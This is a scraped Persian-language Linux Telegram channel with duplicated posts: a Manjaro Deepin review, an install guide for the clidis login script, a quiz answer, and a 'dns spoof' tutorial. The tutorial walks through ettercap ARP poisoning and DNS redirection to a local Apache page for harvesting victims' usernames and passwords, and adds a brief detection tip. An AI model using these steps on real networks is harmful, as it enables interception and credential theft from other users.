به نام خالق منطق
Manjaro Deepin
توزیع مانجارو یک توزیع بر پایه ی Arch Linux با مخازن خاص خودش هست که طی 2 یا 3 سال اخیر توجه عده ی زیادی از کاربران دنیای گنولینوکس رو به خودش جلب کرده؛ حالا قصد داریم در مورد یکی از بهترین نسخه های این توزیع خوب کمی موشکافانه تر از همیشه بحث کنیم.
مانجارو دیپن : مانجارو دیپن یک نسخه از مجموعه ی توزیع مانجارو هست که به صورت پیشفرض برای میزکار دیپن کانفیگ شده؛ میزکار دیپن ، میزکار پیشفرض توزیع دیپن ، توسط یک شرکت چینی توسعه داده میشه و به دلیل نو پا بودن هنوز باگ های خیلی زیادی داره به حدی که بعضی از کابران از دیپن به عنوان یک باگ توزیع دار یاد میکنند.
اما نگران باگ دار بودن مانجارو دیپن نباشید؛ توسعه دهندگان مانجارو این میزکار رو خیلی خوب برای مانجارو کانفیگ کردن و بخش عمده ای از باگ های اون رو بر طرف کردن. طی 3 هفته استفاده ی تمام وقتی که از این توزیع داشتم هیچ مشکلی از بابت میزکار مشاهده نکردم ( در صورتی که من از کارت گرافیک nvidia سری GeForce استفاده میکنم )
از ظاهر که بگذریم این توزیع با کرنل نسخه ی LTS معرفی میشه که برای کاربرانی که حوصله ی سر و کله زدن با سیستم عامل و حل مشکلات بعد از اپدیت کرنل رو ندارن بسیار سود مند خواهد بود.
توزیع مانجارو از مدیر بسته ی Pacman استفاده میکنه که یکی از دلایل محبوبیت توزیع های آرچ بیس هست.
مخازن توزیع مانجارو کمی بهینه تر از مخازن آرچ هستند و بسته هایی از جمله AUR Helper های معروف رو توی خودشون جا دادن که این اتفاق باعث میشه کاربر نیاز خیلی کمتری به صرف وقت زیاد برای نصب یک بسته داشته باشه.
در کنار این ها مدیر بسته ی گرافیکی Pamac Manager وجود داره که میتونید به کمک اون به صورت گرافیکی از مخازن رسمی و همچنین AUR بسته های مورد نظرتون رو نصب کنید.
همچنین نرم افزار مدیریتی مانجارو به شما توی نصب کرنل های مختلف از جمله کرنل هایی که LTS نیستند کمک میکنه و میتونید به کمک اون اقدام به نصب کرنل های جدید بکنید.
همچنین در نسخه های جدید میزکار دیپن و توزیع مانجارو دیپن مصرف رم به صورت چشم گیری بهینه شده به حدی که بدون غیر فعال کردن هیچ سرویسی مصرف رم توزیع به صورت خام چیزی در حدود 500MB هست که نسبت به میزکار دیپن بسیار مصرف رم مناسبی در کنار یک توزیع مثل مانجارو به حساب می آید
به صورت خلاصه ، توزیع مانجارو دیپن توزیعی پایدار بر پایه ی آرچ هست که با میزکار دیپن عرضه میشه و میتونه به عنوان جایگزین اوبونتو برای کاربران مبتدی معرفی بشه. همچنین به دلیل استفاده از میزکار دیپن ، سازگاری نسبتا خوبی با کارت گرافیک های NVIDIA داره که میتونه مشکلات بعضی از کاربران که با گرافیک NVIDIA دارن رو حل کنه .
🐧 @linuxforlife | لینوکس فور لایف
Manjaro Deepin
توزیع مانجارو یک توزیع بر پایه ی Arch Linux با مخازن خاص خودش هست که طی 2 یا 3 سال اخیر توجه عده ی زیادی از کاربران دنیای گنولینوکس رو به خودش جلب کرده؛ حالا قصد داریم در مورد یکی از بهترین نسخه های این توزیع خوب کمی موشکافانه تر از همیشه بحث کنیم.
مانجارو دیپن : مانجارو دیپن یک نسخه از مجموعه ی توزیع مانجارو هست که به صورت پیشفرض برای میزکار دیپن کانفیگ شده؛ میزکار دیپن ، میزکار پیشفرض توزیع دیپن ، توسط یک شرکت چینی توسعه داده میشه و به دلیل نو پا بودن هنوز باگ های خیلی زیادی داره به حدی که بعضی از کابران از دیپن به عنوان یک باگ توزیع دار یاد میکنند.
اما نگران باگ دار بودن مانجارو دیپن نباشید؛ توسعه دهندگان مانجارو این میزکار رو خیلی خوب برای مانجارو کانفیگ کردن و بخش عمده ای از باگ های اون رو بر طرف کردن. طی 3 هفته استفاده ی تمام وقتی که از این توزیع داشتم هیچ مشکلی از بابت میزکار مشاهده نکردم ( در صورتی که من از کارت گرافیک nvidia سری GeForce استفاده میکنم )
از ظاهر که بگذریم این توزیع با کرنل نسخه ی LTS معرفی میشه که برای کاربرانی که حوصله ی سر و کله زدن با سیستم عامل و حل مشکلات بعد از اپدیت کرنل رو ندارن بسیار سود مند خواهد بود.
توزیع مانجارو از مدیر بسته ی Pacman استفاده میکنه که یکی از دلایل محبوبیت توزیع های آرچ بیس هست.
مخازن توزیع مانجارو کمی بهینه تر از مخازن آرچ هستند و بسته هایی از جمله AUR Helper های معروف رو توی خودشون جا دادن که این اتفاق باعث میشه کاربر نیاز خیلی کمتری به صرف وقت زیاد برای نصب یک بسته داشته باشه.
در کنار این ها مدیر بسته ی گرافیکی Pamac Manager وجود داره که میتونید به کمک اون به صورت گرافیکی از مخازن رسمی و همچنین AUR بسته های مورد نظرتون رو نصب کنید.
همچنین نرم افزار مدیریتی مانجارو به شما توی نصب کرنل های مختلف از جمله کرنل هایی که LTS نیستند کمک میکنه و میتونید به کمک اون اقدام به نصب کرنل های جدید بکنید.
همچنین در نسخه های جدید میزکار دیپن و توزیع مانجارو دیپن مصرف رم به صورت چشم گیری بهینه شده به حدی که بدون غیر فعال کردن هیچ سرویسی مصرف رم توزیع به صورت خام چیزی در حدود 500MB هست که نسبت به میزکار دیپن بسیار مصرف رم مناسبی در کنار یک توزیع مثل مانجارو به حساب می آید
به صورت خلاصه ، توزیع مانجارو دیپن توزیعی پایدار بر پایه ی آرچ هست که با میزکار دیپن عرضه میشه و میتونه به عنوان جایگزین اوبونتو برای کاربران مبتدی معرفی بشه. همچنین به دلیل استفاده از میزکار دیپن ، سازگاری نسبتا خوبی با کارت گرافیک های NVIDIA داره که میتونه مشکلات بعضی از کاربران که با گرافیک NVIDIA دارن رو حل کنه .
🐧 @linuxforlife | لینوکس فور لایف
نمونه ی ( تا حدودی شخصی سازی شده ) از توزیع Manjaro Deepin نسخه ی آخر بعد از 3 هفته مورد استفاده قرار گرفتن
🐧 @linuxforlife | لینوکس فور لایف
🐧 @linuxforlife | لینوکس فور لایف
GNU/Linux(news) pinned «به نام خالق منطق Manjaro Deepin توزیع مانجارو یک توزیع بر پایه ی Arch Linux با مخازن خاص خودش هست که طی 2 یا 3 سال اخیر توجه عده ی زیادی از کاربران دنیای گنولینوکس رو به خودش جلب کرده؛ حالا قصد داریم در مورد یکی از بهترین نسخه های این توزیع خوب کمی موشکافانه…»
به نام خداوند جان و خرد
مفتخرم که اعلام کنم بعد از چند ماه تاخیر و امروز و فردا کردن بالاخره به کمک یکی از دوستان موفق شدیم اسکریپت مدیریت صفحه ی ورود فوق سبک خودمون به نام clidis ( کِلای دیس ) رو تکمیل کنیم.
امروز بعد از تست نهایی این اسکریپت بر روی گیتهاب به همراه اموزش نصب قرار گرفت و شما میتونید از همین لحظه اون رو برای خودتون نصب کنید و از کاهش مصرف رم چشم گیر خودتون لذت ببرید !
لینک گیت هاب پروژه :
https://github.com/virtualdemon/clidis
اموزش نصب فارسی :
1. اسکریپت رو به کمک wget یا curl دانلود و به پوشه ی هوم خودتون منتقل کنید :
1. ابتدا display manager فعلی خودتون رو غیر فعال کنید :
VirtualDemon
MisterH
🆔 @linuxforlife
مفتخرم که اعلام کنم بعد از چند ماه تاخیر و امروز و فردا کردن بالاخره به کمک یکی از دوستان موفق شدیم اسکریپت مدیریت صفحه ی ورود فوق سبک خودمون به نام clidis ( کِلای دیس ) رو تکمیل کنیم.
امروز بعد از تست نهایی این اسکریپت بر روی گیتهاب به همراه اموزش نصب قرار گرفت و شما میتونید از همین لحظه اون رو برای خودتون نصب کنید و از کاهش مصرف رم چشم گیر خودتون لذت ببرید !
لینک گیت هاب پروژه :
https://github.com/virtualdemon/clidis
اموزش نصب فارسی :
1. اسکریپت رو به کمک wget یا curl دانلود و به پوشه ی هوم خودتون منتقل کنید :
wget https://raw.githubusercontent.com/virtualdemon/clidis/master/clidis -O ~/.clidis
curl https://raw.githubusercontent.com/virtualdemon/clidis/master/clidis -o ~/.clidis
2. برای اجرای درست اسکریپت به اون دسترسی لازم رو بدید ( فقط یکبار زدن دستور کافیست ) :chmod +x ~/.clidis
3. وقتی که هیچ display manager ای ( هیچ محیط گرافیکی ای ) در حال اجرا نیست اسکریپت رو اجرا کنید :~/.clidis
اجرای خودکار بعد از لاگین کردن :1. ابتدا display manager فعلی خودتون رو غیر فعال کنید :
sudo systemctl disable display-manager.service
2. متن زیر رو به ابتدای فایل پروفایل شل خودتون اضافه کنید (برای zsh -> ~/.zprofile
و برای bash -> ~/.bash_profile
) :exec bash $HOME/.clidis
اگر نمیدونید از چه شلی استفاده میکنید از دستور زیر کمک بگیریدecho $SHELL
تهیه شده توسط :VirtualDemon
MisterH
🆔 @linuxforlife
جواب سوال ساده قبل:)👀
در مورد اولویت عملگرها حتما یه مطالعه داشته باشید; جواب 10 میشه
چرا؟ چون اولویت عملگر ضرب از اولویت عملگر جمع بیشتر هستش.
🐧 @linuxforlife | لینوکس فور لایف
در مورد اولویت عملگرها حتما یه مطالعه داشته باشید; جواب 10 میشه
چرا؟ چون اولویت عملگر ضرب از اولویت عملگر جمع بیشتر هستش.
🐧 @linuxforlife | لینوکس فور لایف
dns spoof
این روش برای گمراه کردن یا spoof در رنج ای پی خودمان هست
برنامه ettercap را نصب میکنیم برای شنود
sudo apt install ettercap
در فایل کانفیگ زیر ec_uid و ec_gid را صفر قرار میدهیم که در ابتدای فایل زیر هست
sudo vi /etc/ettercap/etter.conf
سپس به قسمت پایین فایل بالا میرویم که نوشته شده linux در قسمت
if you use iptables
دو خط پایین این قسمت را هشتک های قبل آن را پاک میکنیم که مربوط به کانفیگ فایروال هست
با کامند زیر برنامه به صورت گرافیکی اجرا میکنیم
sudo ettercap -G
برنامه که اجرا شد طبق دستورالعمل زیر عمل میکنیم
Sniff > Unified sniffing > Select your interface
اگر اسم کارت شبکه خود را نمیدانید در ترمینال با کامند زیر آن را پیدا کنید
sudo ifconfig
بعد از انتخاب کارت شبکه به صورت اتومات شروع به sniff میکند بنابراین آن را stop میکنیم
Start > Stop sniffing
سپس در برنامه برای اسکن هاست های در رنج ای پی خودمان به قسمت زیر میرویم
Hosts > Scan for hosts
خب در اینجا دو تا تارگت حداقل باید موجود باشه یکی gateway خودتان یکی دیگر هم به عنوان تارگت هست
برای شناسایی gateway خودمان میتونیم در ترمینال از طریق کامند زیر پیدا کنیم
sudo route -n
سپس در برنامه تارگت را به عنوان تارگت اول و خودتان را به عنوان تارگت دوم انتخاب کنید
بعد در برنامه برای تنظیم پروتکل مورد نظر به قسمت زیر رفته و پروتکل ARP که بر اساس mac address , ipv4 هست انتخاب میکنیم
MITM > ARP Poisonning >Sniff remote connections
سپس به قسمت پلاگین رفته و dns_spoof انتخاب میکنیم
Plugins > Manage the plugins >dns_spoof
خب حالا باید یک سایت را برای گمراه کردن انتخاب کنیم یعنی فرد مقابل وارد اون سایت مورد نظر بشه در واقع وارد سایت مد نظر شما شده و شما به راحتی با یک اسکریپت میتونید رمز عبور و یوزر نیم فرد مقابل برای خودتان بفرستید
ابتدا در کانفیگ سایت مورد نظر انتخاب میکنیم
sudo vi /etc/ettercap/etter.dns
در فایل کانفیگ بالا قتی که باز شد به پایین میرویم تا به microsoft.com برسیم در زبر آن به صورت زیر سایت مورد نظر اضافه میکنیم
victim site.com A myip
*.victim site.com A myip
سپس سیو میکنیم
حدالمکان روی سایت های معتبر امثال گوگل ست نکنید چون ممکنه ریدایرکت نکنه یا جیمیل فقط ۷۰ درصد اینکار میکنه
سپس ترمینال باز میکن و کامند زیر را بزنید
sudo service apache2 start
خب اگر میخواید ببینید که فرد قربانی چه سایتی را میبیند میتوانید به قسمت زیر بروید
cd /var/www/html»»»index.html
در این فایل ذخیره میشود یعنی قربانی هر بار به سایت مورد نظر میرود در واقع به فایل شما وارد شده است و به راحتی با یک اسکریپت میتوانید اطلاعات را از قربانی بگیرید
رفع مشکل
کامند زیر را در ترمینال بزنید
sudo arp -a
اگر مک آدرس و ای پی های شما در آن موجود بود پس شما فعلا مشکلی ندارید و اگر موجود نبود نسبت به تغییر dns خود اقدام کنید
#هک
#ضدهک
🆔 @linuxforlife
این روش برای گمراه کردن یا spoof در رنج ای پی خودمان هست
برنامه ettercap را نصب میکنیم برای شنود
sudo apt install ettercap
در فایل کانفیگ زیر ec_uid و ec_gid را صفر قرار میدهیم که در ابتدای فایل زیر هست
sudo vi /etc/ettercap/etter.conf
سپس به قسمت پایین فایل بالا میرویم که نوشته شده linux در قسمت
if you use iptables
دو خط پایین این قسمت را هشتک های قبل آن را پاک میکنیم که مربوط به کانفیگ فایروال هست
با کامند زیر برنامه به صورت گرافیکی اجرا میکنیم
sudo ettercap -G
برنامه که اجرا شد طبق دستورالعمل زیر عمل میکنیم
Sniff > Unified sniffing > Select your interface
اگر اسم کارت شبکه خود را نمیدانید در ترمینال با کامند زیر آن را پیدا کنید
sudo ifconfig
بعد از انتخاب کارت شبکه به صورت اتومات شروع به sniff میکند بنابراین آن را stop میکنیم
Start > Stop sniffing
سپس در برنامه برای اسکن هاست های در رنج ای پی خودمان به قسمت زیر میرویم
Hosts > Scan for hosts
خب در اینجا دو تا تارگت حداقل باید موجود باشه یکی gateway خودتان یکی دیگر هم به عنوان تارگت هست
برای شناسایی gateway خودمان میتونیم در ترمینال از طریق کامند زیر پیدا کنیم
sudo route -n
سپس در برنامه تارگت را به عنوان تارگت اول و خودتان را به عنوان تارگت دوم انتخاب کنید
بعد در برنامه برای تنظیم پروتکل مورد نظر به قسمت زیر رفته و پروتکل ARP که بر اساس mac address , ipv4 هست انتخاب میکنیم
MITM > ARP Poisonning >Sniff remote connections
سپس به قسمت پلاگین رفته و dns_spoof انتخاب میکنیم
Plugins > Manage the plugins >dns_spoof
خب حالا باید یک سایت را برای گمراه کردن انتخاب کنیم یعنی فرد مقابل وارد اون سایت مورد نظر بشه در واقع وارد سایت مد نظر شما شده و شما به راحتی با یک اسکریپت میتونید رمز عبور و یوزر نیم فرد مقابل برای خودتان بفرستید
ابتدا در کانفیگ سایت مورد نظر انتخاب میکنیم
sudo vi /etc/ettercap/etter.dns
در فایل کانفیگ بالا قتی که باز شد به پایین میرویم تا به microsoft.com برسیم در زبر آن به صورت زیر سایت مورد نظر اضافه میکنیم
victim site.com A myip
*.victim site.com A myip
سپس سیو میکنیم
حدالمکان روی سایت های معتبر امثال گوگل ست نکنید چون ممکنه ریدایرکت نکنه یا جیمیل فقط ۷۰ درصد اینکار میکنه
سپس ترمینال باز میکن و کامند زیر را بزنید
sudo service apache2 start
خب اگر میخواید ببینید که فرد قربانی چه سایتی را میبیند میتوانید به قسمت زیر بروید
cd /var/www/html»»»index.html
در این فایل ذخیره میشود یعنی قربانی هر بار به سایت مورد نظر میرود در واقع به فایل شما وارد شده است و به راحتی با یک اسکریپت میتوانید اطلاعات را از قربانی بگیرید
رفع مشکل
کامند زیر را در ترمینال بزنید
sudo arp -a
اگر مک آدرس و ای پی های شما در آن موجود بود پس شما فعلا مشکلی ندارید و اگر موجود نبود نسبت به تغییر dns خود اقدام کنید
#هک
#ضدهک
🆔 @linuxforlife